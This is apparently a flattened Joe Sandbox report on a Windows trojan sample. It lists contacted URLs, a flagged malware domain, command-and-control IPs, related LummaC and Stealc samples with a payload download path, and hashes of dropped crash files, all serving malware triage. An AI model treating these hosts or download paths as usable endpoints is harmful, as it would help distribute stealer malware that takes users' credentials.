                                                                                                                                                                        https://store.steampowered.com/privacy_agreement/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_AE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://post-to-me.com/track_prt.php?sub=lBb4XI4eGD.exefalse
                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                            unknown
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.google.com/recaptcha/E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://checkout.steampowered.com/E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://help.steampowered.com/E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/profiles/765611997243319009E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://api.steampowered.com/E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://post-to-me.com/lBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://store.steampowered.com/points/shopE6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://store.steampowered.com/account/cookiepreferences/E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000687000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://store.steampowered.com/mobileE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://steamcommunity.com/E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/;E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/about/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&lE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          172.67.179.207
                                                                                                                                                                                                          post-to-me.comUnited States
                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          104.102.49.254
                                                                                                                                                                                                          steamcommunity.comUnited States
                                                                                                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                                                                                                          176.113.115.19
                                                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                                                          49505SELECTELRUfalse
                                                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                          Analysis ID:1589513
                                                                                                                                                                                                          Start date and time:2025-01-12 17:44:16 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 8m 45s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:12
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:lBb4XI4eGD.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:4c9a8f87a919e9fccd2476b3689d05de.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.troj.evad.winEXE@4/7@11/3
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 94%
                                                                                                                                                                                                          • Number of executed functions: 41
                                                                                                                                                                                                          • Number of non-executed functions: 341
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.190.159.71, 20.12.23.50, 13.107.246.45
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          11:45:26API Interceptor8895556x Sleep call for process: lBb4XI4eGD.exe modified
                                                                                                                                                                                                          11:45:29API Interceptor5x Sleep call for process: E6F4.tmp.exe modified
                                                                                                                                                                                                          11:45:37API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          172.67.179.207fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                        EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                          ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                            6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                              104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                              • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                              http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                              176.113.115.19b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              post-to-me.comb0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                              steamcommunity.comUWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              x.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              CLOUDFLARENETUStasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 172.67.185.28
                                                                                                                                                                                                                              UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                              • 104.21.14.233
                                                                                                                                                                                                                              rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.26.11.53
                                                                                                                                                                                                                              mNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 172.67.162.17
                                                                                                                                                                                                                              gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                              • 104.26.13.205
                                                                                                                                                                                                                              Loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 104.16.184.241
                                                                                                                                                                                                                              v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                              • 104.21.85.189
                                                                                                                                                                                                                              installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.21.16.1
                                                                                                                                                                                                                              Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 104.21.34.147
                                                                                                                                                                                                                              SELECTELRU176.113.115.170.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                                                              • 176.113.115.170
                                                                                                                                                                                                                              b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              1In8uYbvZJ.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 176.113.115.177
                                                                                                                                                                                                                              xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              AKAMAI-ASUSUWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              mNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 23.49.251.20
                                                                                                                                                                                                                              res.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 184.85.6.161
                                                                                                                                                                                                                              176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 104.102.22.125
                                                                                                                                                                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 23.212.88.20
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              sE5IdDeTp2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              5vrRrFN56j.exeGet hashmaliciousBdaejecBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              gem2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              1387457-38765948.15.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              build.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              zmpZMfK1b4.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                              • 172.67.179.207
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                              Entropy (8bit):0.9675713403107463
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:fVfC1TipYsThBVod7Rr6tQXIDcQqc6mcEKcw34e8+HbHg/wWGTf3hOyc45WAU6NI:fFCgpYI00kigMajsFRzuiFmZ24IO8R
                                                                                                                                                                                                                              MD5:A71EEB4E6758D418FA6FA98BBDDA920E
                                                                                                                                                                                                                              SHA1:DA783A700E395FD8D928BC97DA73127DB0CECBE8
                                                                                                                                                                                                                              SHA-256:1B08B9E39E5EA362186F03DC27A0C1B14B75B91A1FCE81DB4E863B6F0277289A
                                                                                                                                                                                                                              SHA-512:765F27CB6FECD578CC2FD517E142C8F950B0844195BE73761BA5AE4AC322D6B5AD92C2DBE82CB74BF401B0CBF838F167819397534266DC50DACAA46963443EEB
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.1.7.3.9.3.2.4.5.5.2.2.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.1.7.3.9.3.2.9.5.5.2.1.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.3.1.5.c.c.a.-.9.3.6.c.-.4.1.6.3.-.9.7.6.9.-.e.c.8.1.0.d.a.2.0.2.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.4.f.5.8.5.2.-.e.6.0.9.-.4.f.c.4.-.b.6.0.3.-.2.b.f.c.2.2.6.3.5.4.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.6.F.4...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.d.4.-.0.0.0.1.-.0.0.1.4.-.6.d.a.8.-.6.c.6.2.1.1.6.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.7.d.b.c.3.c.f.8.f.8.5.4.f.c.6.5.f.9.2.1.4.6.5.0.0.a.6.7.f.c.7.0.0.0.0.f.f.f.f.!.0.0.0.0.2.c.8.f.a.1.7.d.0.5.2.5.1.b.5.1.5.c.c.5.2.6.9.4.3.3.5.a.8.8.c.7.a.6.0.9.e.3.0.3.!.E.6.F.4...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5./.
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Sun Jan 12 16:45:32 2025, 0x1205a4 type
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45136
                                                                                                                                                                                                                              Entropy (8bit):2.513400559449616
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:KuU7X5yr2Xea9Op1BtCjCRdUUlWZVvF6opRTIbRm4Vc:T2Xex7BojqiPJpURmic
                                                                                                                                                                                                                              MD5:FD04ADF9B52F666CCE6CA4BA9033AF83
                                                                                                                                                                                                                              SHA1:75D187D04BE1B06F758574F28E64DA547D254F4D
                                                                                                                                                                                                                              SHA-256:EBAEBE60C20C7159A16C798D8A55E5AD57CD02DB5AA391A8ABBADA0960102C29
                                                                                                                                                                                                                              SHA-512:164B076DB21D25F460018E280AAF76AF7729D516200BD2BD6B785AB5C110712EF8BECC9494FA695AD9B4467A128426C5595244054DEA85B248B6F71DE22E7284
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:MDMP..a..... .........g............4...............H...........<.......d...|-..........`.......8...........T............?...p......................................................................................................eJ......t ......GenuineIntel............T.............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8394
                                                                                                                                                                                                                              Entropy (8bit):3.6973464998911503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJcr6b8a6YzD56fgmfl94bPpDT89byhsf2jmm:R6lXJA6b8a6Yf56fgmfl9Nyaf6
                                                                                                                                                                                                                              MD5:AC5E6CC21FB720C309B4F75E281CB0D5
                                                                                                                                                                                                                              SHA1:C1777F7535E04033EEC913AAB54D63B77B80E902
                                                                                                                                                                                                                              SHA-256:6DFE436528662BE851D0F4DA4DBF003CF85C6F2425DB7B287C197CF162E955C4
